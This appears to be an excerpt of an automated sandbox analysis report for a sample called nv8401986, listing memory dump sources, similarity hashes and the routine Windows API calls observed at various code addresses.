                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Container_base12Container_base12::~_std::_
                                                                                                                                                                                                          • String ID: A valid JSON document must be either an array or an object value.
                                                                                                                                                                                                          • API String ID: 1531518832-2233189945
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294499264.000000000C900000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C900000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c900000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: #,$w
                                                                                                                                                                                                          • API String ID: 0-4160908511
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471B6D
                                                                                                                                                                                                          • Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection.LIBCONCRTD ref: 00471C07
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AsyncTask$Affinity::operator!=CollectionCollection::~_Concurrency::details::Concurrency::details::_Hardware
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3541056932-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00433370: GetCurrentProcessId.KERNEL32(00000000), ref: 0043341E
                                                                                                                                                                                                            • Part of subcall function 00433370: PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00433432
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 0042670D
                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00400001), ref: 0042673B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$CurrentPeekPostProcessWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1186865699-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00417013
                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?), ref: 00417030
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressEnterInit_thread_footerInitializeLeaveProcQueryValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1845476169-0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00532D47
                                                                                                                                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00532D54
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2279764990-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00472C90: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00472CBB
                                                                                                                                                                                                          • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00473273
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004732A1
                                                                                                                                                                                                            • Part of subcall function 00472C20: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00472C4B
                                                                                                                                                                                                            • Part of subcall function 00472B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00472B6B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::ContextIdentityQueueWork$Affinity::operator!=Hardware
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3741678075-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00421FAD
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00421FC1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0040835E
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00408372
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0044C76E
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 0044C782
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00422EFE
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00422F12
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0041141E
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00411432
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0043341E
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00433432
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0043BECD
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 0043BEE1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetLastError.KERNEL32(0058C738,00000010), ref: 00524F4E
                                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 00524F55
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorExitLastThreadUser
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1750398979-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetLastError.KERNEL32(0058C758,00000010), ref: 00524FCD
                                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 00524FD4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorExitLastThreadUser
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1750398979-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004266E0: IsWindow.USER32(?), ref: 0042670D
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlInitializeCriticalSection.NTDLL(00598018), ref: 0043BD52
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: __Init_thread_footer.LIBCMT ref: 0043BD6E
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlEnterCriticalSection.NTDLL ref: 0043BD89
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlLeaveCriticalSection.NTDLL(00598018), ref: 0043BE0F
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0043B27F
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0043B294
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$FreeLibrary$EnterInit_thread_footerInitializeLeaveWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 552026310-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0048FC70: GetVersionExW.KERNEL32(00000114,00000000,00000000), ref: 0048FCB4
                                                                                                                                                                                                            • Part of subcall function 0048CC10: _Smanip.LIBCPMT ref: 0048CCA2
                                                                                                                                                                                                            • Part of subcall function 0048CE20: GetProcAddress.KERNEL32(?,?), ref: 0048CEBF
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0048E064
                                                                                                                                                                                                            • Part of subcall function 0048D030: GetProcAddress.KERNEL32(00000003,00000000), ref: 0048D0E2
                                                                                                                                                                                                            • Part of subcall function 0048D030: GetProcAddress.KERNEL32(00000003,00000000), ref: 0048D135
                                                                                                                                                                                                            • Part of subcall function 0048D030: GetProcAddress.KERNEL32(00000003,00000000), ref: 0048D188
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0048DD3F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CloseHandle$SmanipVersion
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3547271121-0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3304984035.000000000EC80000.00000010.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_ec80000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Ak
                                                                                                                                                                                                          • API String ID: 0-1927009387
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: "m
                                                                                                                                                                                                          • API String ID: 0-3580381498
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostMessageW.USER32(?,000004C9,00000000,00000000), ref: 004347D2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(00000000), ref: 00481F69
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClientRect
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 846599473-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0048D960: InterlockedCompareExchange.KERNEL32(00597AA4,000000FF,00000000), ref: 0048D970
                                                                                                                                                                                                            • Part of subcall function 0048D960: InterlockedExchange.KERNEL32(00597AA4,00000001), ref: 0048D994
                                                                                                                                                                                                          • _Smanip.LIBCPMT ref: 0048EB31
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExchangeInterlocked$CompareSmanip
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2033401057-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0051A298
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CallFilterFunc@8
                                                                                                                                                                                                          • String ID:
